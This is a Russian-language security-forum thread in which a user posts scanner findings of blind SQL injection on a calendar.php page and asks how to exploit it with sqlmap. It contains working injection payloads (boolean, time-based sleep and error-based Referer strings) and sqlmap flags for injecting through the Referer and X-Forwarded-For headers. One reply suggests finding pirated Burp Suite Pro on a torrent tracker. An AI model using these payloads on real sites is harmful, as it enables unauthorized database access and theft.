ANTICHAT — форум по информационной безопасности, OSINT и технологиям

В мапе пишет

[ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) byusing higher verbosity levels

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded GET input order was set to 1,(select case when (3*2*1=6 AND 000513=000513) then 1 else 1*(select table_name from information_schema.tables)end)=1

This vulnerability affects /tools/calendar.php.

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded GET input date was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/


Подскажите как раскрутить мапом

Мне в соседней теме owasp zap посоветовали.

альтернатив полно, самые крутые штуки которыми я пользовался в kali linux это были - OWASP OWTF и OWASP Zed Attack

Можно использовать ещё Nessus интегрируя его с Metasploit кстати в Metasploit тоже полно модулей для тестирования. Ну и конечно же можно использовать мой любимый

OpenVAS желательно новую версия.. А если ты хочешь получить 100% результат и быть гуру в веб хакинге юзай как все нормальские пен-тестеры

Burp Suite только желательно найди pro в сети вроде на каком то торентрекере видел.

Referer: 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(113),CHAR( 104),CHAR(115),CHAR(68),CHAR(121),CHAR(72),CHAR(69 ),CHAR(108)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Cookie: PHPSESSID=jhhavo515jluqct43if2tj7fp3

как sqlmap"om раскрутить такую скулю?

--referer="1*"

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)

AppleWebKit/537.21 (KHTML, like Gecko)

Chrome/41.0.2228.0 Safari/537.21

X-Forwarded-For: 1' а как быть с этим?

гуглить вообще пробовали?

--header="X-Forwarded-For: 1*"

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Настоятельно рекомендую запомнить Опцию

--wizard- Это опция помощник , sqlmap будет задавать тебе вопросы и на основании твоих ответов будет делать то ли и иное действие. тебе остаётся лишь жать кнопку , одну из двух